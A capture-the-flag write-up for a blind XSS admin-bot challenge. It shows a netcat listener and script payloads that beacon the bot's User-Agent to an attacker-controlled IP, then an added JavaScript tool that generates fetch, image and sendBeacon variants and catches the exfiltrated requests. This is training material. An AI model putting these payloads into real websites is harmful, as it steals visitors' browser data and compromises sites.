
Want to run this challenge locally?

docker run -d --restart always -p 3555:3555 --name xss-admin-bot joshbeck2024/ctf-xss-admin-bot

These types of challenges are very common. We have an admin ‘bot’ that acts as a shadow user: it browses the website you are attempting to compromise. The goal is to exploit the shadow user’s browser via XSS or a similar client-side attack.

We are told that an admin will view our message every minute, so we can assume a bot is active. This is blind XSS: we won’t see the payload execute or its output directly. We’ll need to set up a listener we control and force the shadow user’s browser to make a request to it, carrying the data we want out.

Spin up a nc (netcat) listener on Kali

nc -lvnp 9001


Payload (replace the IP with your own Kali address, the one the bot can reach):

<script>
// fetch() with mode 'no-cors' sends an opaque request: we never read the response,
// we only need the request to leave the bot's browser and hit our listener.
fetch('http://192.168.228.7:9001/?ua=' + encodeURIComponent(navigator.userAgent), {mode: 'no-cors'});
// Alternative: a top-level redirect. Often more reliable for one-shot exfiltration,
// but it navigates the bot away from the page, so only one value comes back.
// window.location = 'http://192.168.229.149:9001/?ua=' + encodeURIComponent(navigator.userAgent);
</script>

The flag will appear in the User-Agent header (and, URL-encoded, in the ua= query parameter) once the bot loads your message and its browser executes the injected <script>.
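The whole loop in one place, as an added example that is not part of the original write-up: a function that builds the beacon payload (fetch, image or sendBeacon variant), a parser for the raw HTTP request the listener receives (the same bytes netcat prints), and a small raw-socket listener that mirrors nc -lvnp. The listener address, the challenge origin and the sample request at the bottom are constructed for this example.

```javascript
// Added example, not from the original write-up. Listener address and the
// sample request below are constructed.

const LISTENER = 'http://192.168.228.7:9001'; // assumed: Kali IP and nc port

// Build the <script> payload. `expr` is the JS expression evaluated in the
// bot's browser; its value goes into the query string, URL-encoded.
// 'fetch' uses mode 'no-cors': the response is opaque, which is fine because
// we never read it, we only need the request to leave the browser.
// 'img' triggers an image load, which CSP governs via img-src rather than
// connect-src; 'beacon' is queued even if the page navigates away.
function buildPayload(listener, expr = 'navigator.userAgent', variant = 'fetch') {
  const base = JSON.stringify(listener.replace(/\/$/, '') + '/?ua=');
  const value = `encodeURIComponent(${expr})`;
  const body = {
    fetch: `fetch(${base} + ${value}, {mode: "no-cors"});`,
    img: `new Image().src = ${base} + ${value};`,
    beacon: `navigator.sendBeacon(${base} + ${value});`,
  }[variant];
  if (!body) throw new Error(`unknown variant: ${variant}`);
  return `<script>${body}</script>`;
}

// Parse a raw HTTP/1.x request (request line + headers) into the fields we
// care about: the `ua` query parameter and the User-Agent header.
function parseExfilRequest(raw) {
  const head = raw.split(/\r?\n\r?\n/)[0];
  const lines = head.split(/\r?\n/);
  const [method, target] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i === -1) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  // The target is path-only ("/?ua=..."), so URL() needs a dummy base.
  const url = new URL(target, 'http://listener.invalid');
  return {
    method,
    path: url.pathname,
    ua: url.searchParams.get('ua'),            // percent-decoded for us
    userAgentHeader: headers['user-agent'] ?? null,
    origin: headers['origin'] ?? headers['referer'] ?? null,
  };
}

// Raw TCP listener that mirrors `nc -lvnp`: prints the parsed request and
// answers 204 so the bot's browser does not hang on an open socket. Only
// started when RUN_LISTENER=1 is set, so the file is safe to import.
function startListener(port = 9001) {
  const net = require('node:net');
  return net.createServer((sock) => {
    let buf = '';
    sock.on('data', (chunk) => {
      buf += chunk.toString('latin1');
      if (!/\r?\n\r?\n/.test(buf)) return;      // wait for end of headers
      console.log(JSON.stringify(parseExfilRequest(buf), null, 2));
      sock.end('HTTP/1.1 204 No Content\r\nContent-Length: 0\r\n\r\n');
    });
  }).listen(port, '0.0.0.0', () => console.log(`listening on ${port}`));
}

// Constructed sample: what the bot's browser would send after running the
// fetch variant of the payload. The User-Agent value is a placeholder.
const SAMPLE_REQUEST =
  'GET /?ua=Mozilla%2F5.0%20(constructed-sample-bot) HTTP/1.1\r\n' +
  'Host: 192.168.228.7:9001\r\n' +
  'User-Agent: Mozilla/5.0 (constructed-sample-bot)\r\n' +
  'Origin: http://challenge.local\r\n' +
  'Accept: */*\r\n\r\n';

console.log(buildPayload(LISTENER));
console.log(parseExfilRequest(SAMPLE_REQUEST));
if (typeof process !== 'undefined' && process.env.RUN_LISTENER === '1') startListener(9001);
```

Run it with RUN_LISTENER=1 node exfil.js on the Kali box to get the parsed view instead of raw netcat output; the 204 response matters in practice because a listener that never answers can leave the bot's fetch pending until its timeout, and some bots reload the page only after the previous load settles.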
